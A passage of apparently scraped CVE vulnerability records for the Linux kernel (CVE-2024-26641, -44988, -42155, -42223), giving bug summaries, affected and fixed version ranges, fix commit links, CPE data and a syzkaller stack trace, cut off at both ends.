net/ipv6/ip6_input.c:492\n  ip6_mc_input+0xa7e/0xc80 net/ipv6/ip6_input.c:586\n  dst_input include/net/dst.h:461 [inline]\n  ip6_rcv_finish+0x5db/0x870 net/ipv6/ip6_input.c:79\n  NF_HOOK include/linux/netfilter.h:314 [inline]\n  ipv6_rcv+0xda/0x390 net/ipv6/ip6_input.c:310\n  __netif_receive_skb_one_core net/core/dev.c:5532 [inline]\n  __netif_receive_skb+0x1a6/0x5a0 net/core/dev.c:5646\n  netif_receive_skb_internal net/core/dev.c:5732 [inline]\n  netif_receive_skb+0x58/0x660 net/core/dev.c:5791\n  tun_rx_batched+0x3ee/0x980 drivers/net/tun.c:1555\n  tun_get_user+0x53af/0x66d0 drivers/net/tun.c:2002\n  tun_chr_write_iter+0x3af/0x5d0 drivers/net/tun.c:2048\n  call_write_iter include/linux/fs.h:2084 [inline]\n  new_sync_write fs/read_write.c:497 [inline]\n  vfs_write+0x786/0x1200 fs/read_write.c:590\n  ksys_write+0x20f/0x4c0 fs/read_write.c:643\n  __do_sys_write fs/read_write.c:655 [inline]\n  __se_sys_write fs/read_write.c:652 [inline]\n  __x64_sys_write+0x93/0xd0 fs/read_write.c:652\n  do_syscall_x64 arch/x86/entry/common.c:52 [inline]\n  do_syscall_64+0x6d/0x140 arch/x86/entry/common.c:83\n entry_SYSCALL_64_after_hwframe+0x63/0x6b\n\nUninit was created at:\n  slab_post_alloc_hook+0x129/0xa70 mm/slab.h:768\n  slab_alloc_node mm/slub.c:3478 [inline]\n  kmem_cache_alloc_node+0x5e9/0xb10 mm/slub.c:3523\n  kmalloc_reserve+0x13d/0x4a0 net/core/skbuff.c:560\n  __alloc_skb+0x318/0x740 net/core/skbuff.c:651\n  alloc_skb include/linux/skbuff.h:1286 [inline]\n  alloc_skb_with_frags+0xc8/0xbd0 net/core/skbuff.c:6334\n  sock_alloc_send_pskb+0xa80/0xbf0 net/core/sock.c:2787\n  tun_alloc_skb drivers/net/tun.c:1531 [inline]\n  tun_get_user+0x1e8a/0x66d0 drivers/net/tun.c:1846\n  tun_chr_write_iter+0x3af/0x5d0 drivers/net/tun.c:2048\n  call_write_iter include/linux/fs.h:2084 [inline]\n  new_sync_write fs/read_write.c:497 [inline]\n  vfs_write+0x786/0x1200 fs/read_write.c:590\n  ksys_write+0x20f/0x4c0 fs/read_write.c:643\n  __do_sys_write fs/read_write.c:655 [inline]\n  __se_sys_write fs/read_write.c:652 [inline]\n  __x64_sys_write+0x93/0xd0 fs/read_write.c:652\n  do_syscall_x64 arch/x86/entry/common.c:52 [inline]\n  do_syscall_64+0x6d/0x140 arch/x86/entry/common.c:83\n entry_SYSCALL_64_after_hwframe+0x63/0x6b\n\nCPU: 0 PID: 5034 Comm: syz-executor331 Not tainted 6.7.0-syzkaller-00562-g9f8413c4a66f #0\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 11/17/2023"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T08:52:54.137Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/a9bc32879a08f23cdb80a48c738017e39aea1080"
        },
        {
          "url": "https://git.kernel.org/stable/c/af6b5c50d47ab43e5272ad61935d0ed2e264d3f0"
        },
        {
          "url": "https://git.kernel.org/stable/c/d54e4da98bbfa8c257bdca94c49652d81d18a4d8"
        },
        {
          "url": "https://git.kernel.org/stable/c/350a6640fac4b53564ec20aa3f4a0922cb0ba5e6"
        },
        {
          "url": "https://git.kernel.org/stable/c/c835df3bcc14858ae9b27315dd7de76370b94f3a"
        },
        {
          "url": "https://git.kernel.org/stable/c/8d975c15c0cd744000ca386247432d57b21f9df0"
        }
      ],
      "title": "ip6_tunnel: make sure to pull inner header in __ip6_tnl_rcv()",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-26641",
    "datePublished": "2024-03-18T10:19:07.581Z",
    "dateReserved": "2024-02-19T14:20:24.137Z",
    "dateUpdated": "2025-05-04T08:52:54.137Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-44988 (GCVE-0-2024-44988)

Vulnerability from cvelistv5 – Published: 2024-09-04 19:54 – Updated: 2025-11-03 22:14

Title

net: dsa: mv88e6xxx: Fix out-of-bound access

Summary

In the Linux kernel, the following vulnerability has been resolved: net: dsa: mv88e6xxx: Fix out-of-bound access If an ATU violation was caused by a CPU Load operation, the SPID could be larger than DSA_MAX_PORTS (the size of mv88e6xxx_chip.ports[] array).

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/4a88fca95c8df3746…
	https://git.kernel.org/stable/c/d39f5be62f098fe36…
	https://git.kernel.org/stable/c/050e7274ab2150cd2…
	https://git.kernel.org/stable/c/a10d0337115a6d223…
	https://git.kernel.org/stable/c/18b2e833daf049223…
	https://git.kernel.org/stable/c/f7d8c2fabd39250cf…
	https://git.kernel.org/stable/c/f87ce03c652dba199…
	https://git.kernel.org/stable/c/528876d867a23b519…

Impacted products

Vendor

Product

Version

Linux

Affected: 27a2fa0098171199022affa76bdf15d77585457f , < 4a88fca95c8df3746b71e31f44a02d35f06f9864 (git)
Affected: 75c05a74e745ae7d663b04d75777af80ada2233c , < d39f5be62f098fe367d672b4dd4bc4b2b80e08e7 (git)
Affected: 75c05a74e745ae7d663b04d75777af80ada2233c , < 050e7274ab2150cd212b2372595720e7b83a15bd (git)
Affected: 75c05a74e745ae7d663b04d75777af80ada2233c , < a10d0337115a6d223a1563d853d4455f05d0b2e3 (git)
Affected: 75c05a74e745ae7d663b04d75777af80ada2233c , < 18b2e833daf049223ab3c2efdf8cdee08854c484 (git)
Affected: 75c05a74e745ae7d663b04d75777af80ada2233c , < f7d8c2fabd39250cf2333fbf8eef67e837f90a5d (git)
Affected: 75c05a74e745ae7d663b04d75777af80ada2233c , < f87ce03c652dba199aef15ac18ade3991db5477e (git)
Affected: 75c05a74e745ae7d663b04d75777af80ada2233c , < 528876d867a23b5198022baf2e388052ca67c952 (git)
Affected: 1657d2814e83d3e338d6d60c5829d15d86645bc0 (git)

Linux

Affected: 5.0
Unaffected: 0 , < 5.0 (semver)
Unaffected: 4.19.323 , ≤ 4.19.* (semver)
Unaffected: 5.4.283 , ≤ 5.4.* (semver)
Unaffected: 5.10.225 , ≤ 5.10.* (semver)
Unaffected: 5.15.166 , ≤ 5.15.* (semver)
Unaffected: 6.1.107 , ≤ 6.1.* (semver)
Unaffected: 6.6.48 , ≤ 6.6.* (semver)
Unaffected: 6.10.7 , ≤ 6.10.* (semver)
Unaffected: 6.11 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-44988",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-04T20:19:54.931496Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-04T20:21:00.834Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:14:40.536Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2024/10/msg00003.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/dsa/mv88e6xxx/global1_atu.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "4a88fca95c8df3746b71e31f44a02d35f06f9864",
              "status": "affected",
              "version": "27a2fa0098171199022affa76bdf15d77585457f",
              "versionType": "git"
            },
            {
              "lessThan": "d39f5be62f098fe367d672b4dd4bc4b2b80e08e7",
              "status": "affected",
              "version": "75c05a74e745ae7d663b04d75777af80ada2233c",
              "versionType": "git"
            },
            {
              "lessThan": "050e7274ab2150cd212b2372595720e7b83a15bd",
              "status": "affected",
              "version": "75c05a74e745ae7d663b04d75777af80ada2233c",
              "versionType": "git"
            },
            {
              "lessThan": "a10d0337115a6d223a1563d853d4455f05d0b2e3",
              "status": "affected",
              "version": "75c05a74e745ae7d663b04d75777af80ada2233c",
              "versionType": "git"
            },
            {
              "lessThan": "18b2e833daf049223ab3c2efdf8cdee08854c484",
              "status": "affected",
              "version": "75c05a74e745ae7d663b04d75777af80ada2233c",
              "versionType": "git"
            },
            {
              "lessThan": "f7d8c2fabd39250cf2333fbf8eef67e837f90a5d",
              "status": "affected",
              "version": "75c05a74e745ae7d663b04d75777af80ada2233c",
              "versionType": "git"
            },
            {
              "lessThan": "f87ce03c652dba199aef15ac18ade3991db5477e",
              "status": "affected",
              "version": "75c05a74e745ae7d663b04d75777af80ada2233c",
              "versionType": "git"
            },
            {
              "lessThan": "528876d867a23b5198022baf2e388052ca67c952",
              "status": "affected",
              "version": "75c05a74e745ae7d663b04d75777af80ada2233c",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "1657d2814e83d3e338d6d60c5829d15d86645bc0",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/dsa/mv88e6xxx/global1_atu.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.0"
            },
            {
              "lessThan": "5.0",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.323",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.283",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.225",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.166",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.107",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.48",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.10.*",
              "status": "unaffected",
              "version": "6.10.7",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.11",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.323",
                  "versionStartIncluding": "4.19.21",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.283",
                  "versionStartIncluding": "5.0",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.225",
                  "versionStartIncluding": "5.0",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.166",
                  "versionStartIncluding": "5.0",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.107",
                  "versionStartIncluding": "5.0",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.48",
                  "versionStartIncluding": "5.0",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10.7",
                  "versionStartIncluding": "5.0",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.11",
                  "versionStartIncluding": "5.0",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "4.20.8",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: dsa: mv88e6xxx: Fix out-of-bound access\n\nIf an ATU violation was caused by a CPU Load operation, the SPID could\nbe larger than DSA_MAX_PORTS (the size of mv88e6xxx_chip.ports[] array)."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T12:58:32.203Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/4a88fca95c8df3746b71e31f44a02d35f06f9864"
        },
        {
          "url": "https://git.kernel.org/stable/c/d39f5be62f098fe367d672b4dd4bc4b2b80e08e7"
        },
        {
          "url": "https://git.kernel.org/stable/c/050e7274ab2150cd212b2372595720e7b83a15bd"
        },
        {
          "url": "https://git.kernel.org/stable/c/a10d0337115a6d223a1563d853d4455f05d0b2e3"
        },
        {
          "url": "https://git.kernel.org/stable/c/18b2e833daf049223ab3c2efdf8cdee08854c484"
        },
        {
          "url": "https://git.kernel.org/stable/c/f7d8c2fabd39250cf2333fbf8eef67e837f90a5d"
        },
        {
          "url": "https://git.kernel.org/stable/c/f87ce03c652dba199aef15ac18ade3991db5477e"
        },
        {
          "url": "https://git.kernel.org/stable/c/528876d867a23b5198022baf2e388052ca67c952"
        }
      ],
      "title": "net: dsa: mv88e6xxx: Fix out-of-bound access",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-44988",
    "datePublished": "2024-09-04T19:54:36.168Z",
    "dateReserved": "2024-08-21T05:34:56.671Z",
    "dateUpdated": "2025-11-03T22:14:40.536Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-42155 (GCVE-0-2024-42155)

Vulnerability from cvelistv5 – Published: 2024-07-30 07:46 – Updated: 2025-05-04 09:24

Title

s390/pkey: Wipe copies of protected- and secure-keys

Summary

In the Linux kernel, the following vulnerability has been resolved: s390/pkey: Wipe copies of protected- and secure-keys Although the clear-key of neither protected- nor secure-keys is accessible, this key material should only be visible to the calling process. So wipe all copies of protected- or secure-keys from stack, even in case of an error.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/c746f7ced4ad88ee4…
	https://git.kernel.org/stable/c/f2ebdadd85af4f4d0…

Impacted products

Vendor

Product

Version

Linux

Affected: e80d4af0a320972aac58e2004d0ba4e44ef4c5c7 , < c746f7ced4ad88ee48d0b6c92710e4674403185b (git)
Affected: e80d4af0a320972aac58e2004d0ba4e44ef4c5c7 , < f2ebdadd85af4f4d0cae1e5d009c70eccc78c207 (git)

Linux

Affected: 4.11
Unaffected: 0 , < 4.11 (semver)
Unaffected: 6.9.9 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T04:54:32.564Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/c746f7ced4ad88ee48d0b6c92710e4674403185b"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/f2ebdadd85af4f4d0cae1e5d009c70eccc78c207"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-42155",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:15:11.881394Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:33:08.077Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/s390/crypto/pkey_api.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "c746f7ced4ad88ee48d0b6c92710e4674403185b",
              "status": "affected",
              "version": "e80d4af0a320972aac58e2004d0ba4e44ef4c5c7",
              "versionType": "git"
            },
            {
              "lessThan": "f2ebdadd85af4f4d0cae1e5d009c70eccc78c207",
              "status": "affected",
              "version": "e80d4af0a320972aac58e2004d0ba4e44ef4c5c7",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/s390/crypto/pkey_api.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.11"
            },
            {
              "lessThan": "4.11",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.9",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.9",
                  "versionStartIncluding": "4.11",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "4.11",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ns390/pkey: Wipe copies of protected- and secure-keys\n\nAlthough the clear-key of neither protected- nor secure-keys is\naccessible, this key material should only be visible to the calling\nprocess. So wipe all copies of protected- or secure-keys from stack,\neven in case of an error."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:24:19.111Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/c746f7ced4ad88ee48d0b6c92710e4674403185b"
        },
        {
          "url": "https://git.kernel.org/stable/c/f2ebdadd85af4f4d0cae1e5d009c70eccc78c207"
        }
      ],
      "title": "s390/pkey: Wipe copies of protected- and secure-keys",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-42155",
    "datePublished": "2024-07-30T07:46:57.729Z",
    "dateReserved": "2024-07-29T15:50:41.194Z",
    "dateUpdated": "2025-05-04T09:24:19.111Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-42223 (GCVE-0-2024-42223)

Vulnerability from cvelistv5 – Published: 2024-07-30 07:47 – Updated: 2025-11-03 22:02

Title

media: dvb-frontends: tda10048: Fix integer overflow

Summary

In the Linux kernel, the following vulnerability has been resolved: media: dvb-frontends: tda10048: Fix integer overflow state->xtal_hz can be up to 16M, so it can overflow a 32 bit integer when multiplied by pll_mfactor. Create a new 64 bit variable to hold the calculations.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/8167e4d7dc086d4f7…
	https://git.kernel.org/stable/c/5c72587d024f087ae…
	https://git.kernel.org/stable/c/e1ba22618758e95e0…
	https://git.kernel.org/stable/c/bd5620439959a7e02…
	https://git.kernel.org/stable/c/1663e2474e4d77718…
	https://git.kernel.org/stable/c/8ac224e9371dc3c4e…
	https://git.kernel.org/stable/c/1121d8a5c6ed6b8fa…
	https://git.kernel.org/stable/c/1aa1329a67cc214c3…

Impacted products

Vendor

Product

Version

Linux

Affected: d114153816ec188b20a37583e66da33d8b2798fe , < 8167e4d7dc086d4f7ca7897dcff3827e4d22c99a (git)
Affected: d114153816ec188b20a37583e66da33d8b2798fe , < 5c72587d024f087aecec0221eaff2fe850d856ce (git)
Affected: d114153816ec188b20a37583e66da33d8b2798fe , < e1ba22618758e95e09c9fd30c69ccce38edf94c0 (git)
Affected: d114153816ec188b20a37583e66da33d8b2798fe , < bd5620439959a7e02012588c724c6ff5143b80af (git)
Affected: d114153816ec188b20a37583e66da33d8b2798fe , < 1663e2474e4d777187d749a5c90ae83232db32bd (git)
Affected: d114153816ec188b20a37583e66da33d8b2798fe , < 8ac224e9371dc3c4eb666033e6b42d05cf5184a1 (git)
Affected: d114153816ec188b20a37583e66da33d8b2798fe , < 1121d8a5c6ed6b8fad492e43b63b386cb6a3a9d8 (git)
Affected: d114153816ec188b20a37583e66da33d8b2798fe , < 1aa1329a67cc214c3b7bd2a14d1301a795760b07 (git)

Linux

Affected: 2.6.31
Unaffected: 0 , < 2.6.31 (semver)
Unaffected: 4.19.318 , ≤ 4.19.* (semver)
Unaffected: 5.4.280 , ≤ 5.4.* (semver)
Unaffected: 5.10.222 , ≤ 5.10.* (semver)
Unaffected: 5.15.163 , ≤ 5.15.* (semver)
Unaffected: 6.1.98 , ≤ 6.1.* (semver)
Unaffected: 6.6.39 , ≤ 6.6.* (semver)
Unaffected: 6.9.9 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:02:25.947Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/8167e4d7dc086d4f7ca7897dcff3827e4d22c99a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/5c72587d024f087aecec0221eaff2fe850d856ce"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e1ba22618758e95e09c9fd30c69ccce38edf94c0"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/bd5620439959a7e02012588c724c6ff5143b80af"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/1663e2474e4d777187d749a5c90ae83232db32bd"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/8ac224e9371dc3c4eb666033e6b42d05cf5184a1"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/1121d8a5c6ed6b8fad492e43b63b386cb6a3a9d8"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/1aa1329a67cc214c3b7bd2a14d1301a795760b07"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-42223",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:14:45.726631Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:33:07.151Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/media/dvb-frontends/tda10048.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "8167e4d7dc086d4f7ca7897dcff3827e4d22c99a",
              "status": "affected",
              "version": "d114153816ec188b20a37583e66da33d8b2798fe",
              "versionType": "git"
            },
            {
              "lessThan": "5c72587d024f087aecec0221eaff2fe850d856ce",
              "status": "affected",
              "version": "d114153816ec188b20a37583e66da33d8b2798fe",
              "versionType": "git"
            },
            {
              "lessThan": "e1ba22618758e95e09c9fd30c69ccce38edf94c0",
              "status": "affected",
              "version": "d114153816ec188b20a37583e66da33d8b2798fe",
              "versionType": "git"
            },
            {
              "lessThan": "bd5620439959a7e02012588c724c6ff5143b80af",
              "status": "affected",
              "version": "d114153816ec188b20a37583e66da33d8b2798fe",
              "versionType": "git"
            },
            {
              "lessThan": "1663e2474e4d777187d749a5c90ae83232db32bd",
              "status": "affected",
              "version": "d114153816ec188b20a37583e66da33d8b2798fe",
              "versionType": "git"
            },
            {
              "lessThan": "8ac224e9371dc3c4eb666033e6b42d05cf5184a1",
              "status": "affected",
              "version": "d114153816ec188b20a37583e66da33d8b2798fe",
              "versionType": "git"
            },
            {
              "lessThan": "1121d8a5c6ed6b8fad492e43b63b386cb6a3a9d8",
              "status": "affected",
              "version": "d114153816ec188b20a37583e66da33d8b2798fe",
              "versionType": "git"
            },
            {
              "lessThan": "1aa1329a67cc214c3b7bd2a14d1301a795760b07",
              "status": "affected",
              "version": "d114153816ec188b20a37583e66da33d8b2798fe",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/media/dvb-frontends/tda10048.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "2.6.31"
            },
            {
              "lessThan": "2.6.31",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.318",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.280",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.222",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.163",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.98",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.39",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.9",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.318",
                  "versionStartIncluding": "2.6.31",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.280",
                  "versionStartIncluding": "2.6.31",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.222",
                  "versionStartIncluding": "2.6.31",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.163",
                  "versionStartIncluding": "2.6.31",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.98",
                  "versionStartIncluding": "2.6.31",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.39",
                  "versionStartIncluding": "2.6.31",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
